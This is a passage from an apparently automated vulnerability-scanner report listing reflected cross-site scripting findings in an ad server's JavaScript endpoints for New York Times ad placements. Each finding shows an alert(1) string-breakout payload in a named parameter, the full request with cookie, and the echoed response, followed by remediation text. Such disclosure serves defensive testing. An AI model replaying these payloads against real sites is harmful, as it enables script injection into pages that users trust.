document.write('<!-- Template Id = 2,594 Template Name = Banner Creative (Flash) - In Page Multiples -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src=\"http://s0.2mdn.ne
...[SNIP]...
e=listings.nytimes.com/BusinessDirectory&pos=TopAd&camp=Amex_PersSavings_Q4-2010_03_1513970-nyt1&ad=728x90_Remnant_ROS_B4763885.2&sn2=6eff218/e43bef4&snr=doubleclick&snx=1289802071&sn1=f9dd9d37/efa65b8300ba"-alert(1)-"8f69fbdd3e9&goto=http://personalsavings.americanexpress.com/savings-product.html");
var wmode = "opaque";
var bg = "same as SWF";
var dcallowscriptaccess = "never";

var openWindow = "false";
var winW = 600;
var
...[SNIP]...

4.60. http://ad.vulnerable.ad.partner/adj/N553.newyorktimes.com/B4763885.2 [sn2 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N553.newyorktimes.com/B4763885.2

Issue detail

The value of the sn2 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4a5ea"-alert(1)-"c7fe987232 was submitted in the sn2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N553.newyorktimes.com/B4763885.2;sz=728x90;pc=nyt146048_244044;ord=2010.11.15.07.15.11;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=TopAd&camp=Amex_PersSavings_Q4-2010_03_1513970-nyt1&ad=728x90_Remnant_ROS_B4763885.2&sn2=6eff218/e43bef44a5ea"-alert(1)-"c7fe987232&snr=doubleclick&snx=1289802071&sn1=f9dd9d37/efa65b8&goto= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: ad.vulnerable.ad.partner
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:19:34 GMT
Expires: Mon, 15 Nov 2010 07:24:34 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6114

document.write('<!-- Template Id = 2,594 Template Name = Banner Creative (Flash) - In Page Multiples -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src=\"http://s0.2mdn.ne
...[SNIP]...
ytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=TopAd&camp=Amex_PersSavings_Q4-2010_03_1513970-nyt1&ad=728x90_Remnant_ROS_B4763885.2&sn2=6eff218/e43bef44a5ea"-alert(1)-"c7fe987232&snr=doubleclick&snx=1289802071&sn1=f9dd9d37/efa65b8&goto=http://personalsavings.americanexpress.com/savings-product.html");
var wmode = "opaque";
var bg = "same as SWF";
var dcallowscriptaccess = "nev
...[SNIP]...

4.61. http://ad.vulnerable.ad.partner/adj/N553.newyorktimes.com/B4763885.2 [sn2 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N553.newyorktimes.com/B4763885.2

Issue detail

The value of the sn2 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3c216'-alert(1)-'68576e4d92 was submitted in the sn2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N553.newyorktimes.com/B4763885.2;sz=728x90;pc=nyt146048_244044;ord=2010.11.15.07.15.11;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=TopAd&camp=Amex_PersSavings_Q4-2010_03_1513970-nyt1&ad=728x90_Remnant_ROS_B4763885.2&sn2=6eff218/e43bef43c216'-alert(1)-'68576e4d92&snr=doubleclick&snx=1289802071&sn1=f9dd9d37/efa65b8&goto= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: ad.vulnerable.ad.partner
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:19:38 GMT
Expires: Mon, 15 Nov 2010 07:24:38 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6106

document.write('<!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page Multiples - [DFA] -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src=\"http://s
...[SNIP]...
ytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=TopAd&camp=Amex_PersSavings_Q4-2010_03_1513970-nyt1&ad=728x90_Remnant_ROS_B4763885.2&sn2=6eff218/e43bef43c216'-alert(1)-'68576e4d92&snr=doubleclick&snx=1289802071&sn1=f9dd9d37/efa65b8&goto=http://personalsavings.americanexpress.com/savings-product.html\">
...[SNIP]...

4.62. http://ad.vulnerable.ad.partner/adj/N553.newyorktimes.com/B4763885.2 [snr parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N553.newyorktimes.com/B4763885.2

Issue detail

The value of the snr request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c25dd'-alert(1)-'da387dc9d56 was submitted in the snr parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N553.newyorktimes.com/B4763885.2;sz=728x90;pc=nyt146048_244044;ord=2010.11.15.07.15.11;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=TopAd&camp=Amex_PersSavings_Q4-2010_03_1513970-nyt1&ad=728x90_Remnant_ROS_B4763885.2&sn2=6eff218/e43bef4&snr=doubleclickc25dd'-alert(1)-'da387dc9d56&snx=1289802071&sn1=f9dd9d37/efa65b8&goto= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: ad.vulnerable.ad.partner
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:19:47 GMT
Expires: Mon, 15 Nov 2010 07:24:47 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6118

document.write('<!-- Template Id = 2,594 Template Name = Banner Creative (Flash) - In Page Multiples -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src=\"http://s0.2mdn.ne
...[SNIP]...
in/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=TopAd&camp=Amex_PersSavings_Q4-2010_03_1513970-nyt1&ad=728x90_Remnant_ROS_B4763885.2&sn2=6eff218/e43bef4&snr=doubleclickc25dd'-alert(1)-'da387dc9d56&snx=1289802071&sn1=f9dd9d37/efa65b8&goto=http://personalsavings.americanexpress.com/savings-product.html\">
...[SNIP]...

4.63. http://ad.vulnerable.ad.partner/adj/N553.newyorktimes.com/B4763885.2 [snr parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N553.newyorktimes.com/B4763885.2

Issue detail

The value of the snr request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ce708"-alert(1)-"1dc8e459cae was submitted in the snr parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N553.newyorktimes.com/B4763885.2;sz=728x90;pc=nyt146048_244044;ord=2010.11.15.07.15.11;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=TopAd&camp=Amex_PersSavings_Q4-2010_03_1513970-nyt1&ad=728x90_Remnant_ROS_B4763885.2&sn2=6eff218/e43bef4&snr=doubleclickce708"-alert(1)-"1dc8e459cae&snx=1289802071&sn1=f9dd9d37/efa65b8&goto= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: ad.vulnerable.ad.partner
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:19:43 GMT
Expires: Mon, 15 Nov 2010 07:24:43 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6107

document.write('<!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page Multiples - [DFA] -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src=\"http://s
...[SNIP]...
in/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=TopAd&camp=Amex_PersSavings_Q4-2010_03_1513970-nyt1&ad=728x90_Remnant_ROS_B4763885.2&sn2=6eff218/e43bef4&snr=doubleclickce708"-alert(1)-"1dc8e459cae&snx=1289802071&sn1=f9dd9d37/efa65b8&goto=http://personalsavings.americanexpress.com/savings-product.html");
var wmode = "opaque";
var bg = "same as SWF";
var dcallowscriptaccess = "never";

var openWi
...[SNIP]...

4.64. http://ad.vulnerable.ad.partner/adj/N553.newyorktimes.com/B4763885.2 [snx parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N553.newyorktimes.com/B4763885.2

Issue detail

The value of the snx request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c41c8"-alert(1)-"ac3f17478db was submitted in the snx parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N553.newyorktimes.com/B4763885.2;sz=728x90;pc=nyt146048_244044;ord=2010.11.15.07.15.11;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=TopAd&camp=Amex_PersSavings_Q4-2010_03_1513970-nyt1&ad=728x90_Remnant_ROS_B4763885.2&sn2=6eff218/e43bef4&snr=doubleclick&snx=1289802071c41c8"-alert(1)-"ac3f17478db&sn1=f9dd9d37/efa65b8&goto= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: ad.vulnerable.ad.partner
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:19:52 GMT
Expires: Mon, 15 Nov 2010 07:24:52 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6118

document.write('<!-- Template Id = 2,594 Template Name = Banner Creative (Flash) - In Page Multiples -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src=\"http://s0.2mdn.ne
...[SNIP]...
ml?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=TopAd&camp=Amex_PersSavings_Q4-2010_03_1513970-nyt1&ad=728x90_Remnant_ROS_B4763885.2&sn2=6eff218/e43bef4&snr=doubleclick&snx=1289802071c41c8"-alert(1)-"ac3f17478db&sn1=f9dd9d37/efa65b8&goto=http://personalsavings.americanexpress.com/savings-product.html");
var wmode = "opaque";
var bg = "same as SWF";
var dcallowscriptaccess = "never";

var openWindow = "false";
...[SNIP]...

4.65. http://ad.vulnerable.ad.partner/adj/N553.newyorktimes.com/B4763885.2 [snx parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N553.newyorktimes.com/B4763885.2

Issue detail

The value of the snx request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 18f06'-alert(1)-'d4d6ba4e70a was submitted in the snx parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N553.newyorktimes.com/B4763885.2;sz=728x90;pc=nyt146048_244044;ord=2010.11.15.07.15.11;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=TopAd&camp=Amex_PersSavings_Q4-2010_03_1513970-nyt1&ad=728x90_Remnant_ROS_B4763885.2&sn2=6eff218/e43bef4&snr=doubleclick&snx=128980207118f06'-alert(1)-'d4d6ba4e70a&sn1=f9dd9d37/efa65b8&goto= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: ad.vulnerable.ad.partner
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:19:56 GMT
Expires: Mon, 15 Nov 2010 07:24:56 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6110

document.write('<!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page Multiples - [DFA] -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src=\"http://s
...[SNIP]...
ml?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=TopAd&camp=Amex_PersSavings_Q4-2010_03_1513970-nyt1&ad=728x90_Remnant_ROS_B4763885.2&sn2=6eff218/e43bef4&snr=doubleclick&snx=128980207118f06'-alert(1)-'d4d6ba4e70a&sn1=f9dd9d37/efa65b8&goto=http://personalsavings.americanexpress.com/savings-product.html\">
...[SNIP]...

4.66. http://ad.vulnerable.ad.partner/adj/N553.newyorktimes.com/B4763885.2 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N553.newyorktimes.com/B4763885.2

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ea110'-alert(1)-'4a1a8ea4008 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N553.newyorktimes.com/B4763885.2;sz=728x90;pc=nyt146048_244044;ord=2010.11.15.07.15.11;click=http://www.nytimes.com/adx/bin/adx_click.html?type=gotoea110'-alert(1)-'4a1a8ea4008&opzn&page=listings.nytimes.com/BusinessDirectory&pos=TopAd&camp=Amex_PersSavings_Q4-2010_03_1513970-nyt1&ad=728x90_Remnant_ROS_B4763885.2&sn2=6eff218/e43bef4&snr=doubleclick&snx=1289802071&sn1=f9dd9d37/efa65b8&goto= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: ad.vulnerable.ad.partner
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:17:56 GMT
Expires: Mon, 15 Nov 2010 07:22:56 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6112

document.write('<!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page Multiples - [DFA] -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src=\"http://s
...[SNIP]...
v8/3a53/7/12b/%2a/a%3B229262899%3B5-0%3B0%3B53186448%3B3454-728/90%3B38213471/38231228/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt146048_244044%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=gotoea110'-alert(1)-'4a1a8ea4008&opzn&page=listings.nytimes.com/BusinessDirectory&pos=TopAd&camp=Amex_PersSavings_Q4-2010_03_1513970-nyt1&ad=728x90_Remnant_ROS_B4763885.2&sn2=6eff218/e43bef4&snr=doubleclick&snx=1289802071&sn1=f9dd9d3
...[SNIP]...

4.67. http://ad.vulnerable.ad.partner/adj/N553.newyorktimes.com/B4763885.2 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N553.newyorktimes.com/B4763885.2

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a35e4"-alert(1)-"75f9009f3b was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N553.newyorktimes.com/B4763885.2;sz=728x90;pc=nyt146048_244044;ord=2010.11.15.07.15.11;click=http://www.nytimes.com/adx/bin/adx_click.html?type=gotoa35e4"-alert(1)-"75f9009f3b&opzn&page=listings.nytimes.com/BusinessDirectory&pos=TopAd&camp=Amex_PersSavings_Q4-2010_03_1513970-nyt1&ad=728x90_Remnant_ROS_B4763885.2&sn2=6eff218/e43bef4&snr=doubleclick&snx=1289802071&sn1=f9dd9d37/efa65b8&goto= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: ad.vulnerable.ad.partner
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:17:52 GMT
Expires: Mon, 15 Nov 2010 07:22:52 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6108

document.write('<!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page Multiples - [DFA] -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src=\"http://s
...[SNIP]...
v8/3a53/7/12a/%2a/d%3B229262899%3B4-0%3B0%3B53186448%3B3454-728/90%3B38212591/38230348/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt146048_244044%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=gotoa35e4"-alert(1)-"75f9009f3b&opzn&page=listings.nytimes.com/BusinessDirectory&pos=TopAd&camp=Amex_PersSavings_Q4-2010_03_1513970-nyt1&ad=728x90_Remnant_ROS_B4763885.2&sn2=6eff218/e43bef4&snr=doubleclick&snx=1289802071&sn1=f9dd9d3
...[SNIP]...

4.68. http://ad.vulnerable.ad.partner/adj/N636.276948.NYTIMES/B4871537.31 [ad parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N636.276948.NYTIMES/B4871537.31

Issue detail

The value of the ad request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b1e6e"-alert(1)-"4b69fadcfd6 was submitted in the ad parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N636.276948.NYTIMES/B4871537.31;sz=336x280;pc=nyt146535_247381;ord=2010.11.15.07.15.37;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=JM07_1464984_nyt8&ad=ROS_PreEmpt_BA2b1e6e"-alert(1)-"4b69fadcfd6&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802073&sn1=202bf1a7/adef6a1b&goto= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: ad.vulnerable.ad.partner
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:21:09 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6428

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Mon Oct 25 14:07:59 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
3Bpc%3Dnyt146535_247381%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=JM07_1464984_nyt8&ad=ROS_PreEmpt_BA2b1e6e"-alert(1)-"4b69fadcfd6&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802073&sn1=202bf1a7/adef6a1b&goto=http://www.xc4.is");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcal
...[SNIP]...

4.69. http://ad.vulnerable.ad.partner/adj/N636.276948.NYTIMES/B4871537.31 [ad parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N636.276948.NYTIMES/B4871537.31

Issue detail

The value of the ad request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload eb391'-alert(1)-'9f92add2e4d was submitted in the ad parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N636.276948.NYTIMES/B4871537.31;sz=336x280;pc=nyt146535_247381;ord=2010.11.15.07.15.37;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=JM07_1464984_nyt8&ad=ROS_PreEmpt_BA2eb391'-alert(1)-'9f92add2e4d&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802073&sn1=202bf1a7/adef6a1b&goto= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: ad.vulnerable.ad.partner
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:21:14 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6428

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Mon Oct 25 14:07:59 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
3Bpc%3Dnyt146535_247381%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=JM07_1464984_nyt8&ad=ROS_PreEmpt_BA2eb391'-alert(1)-'9f92add2e4d&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802073&sn1=202bf1a7/adef6a1b&goto=http://www.xc4.is\">
...[SNIP]...

4.70. http://ad.vulnerable.ad.partner/adj/N636.276948.NYTIMES/B4871537.31 [camp parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N636.276948.NYTIMES/B4871537.31

Issue detail

The value of the camp request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6b5a0"-alert(1)-"672f1f4bd was submitted in the camp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N636.276948.NYTIMES/B4871537.31;sz=336x280;pc=nyt146535_247381;ord=2010.11.15.07.15.37;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=JM07_1464984_nyt86b5a0"-alert(1)-"672f1f4bd&ad=ROS_PreEmpt_BA2&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802073&sn1=202bf1a7/adef6a1b&goto= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: ad.vulnerable.ad.partner
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:21:01 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6420

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Mon Oct 25 14:06:42 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
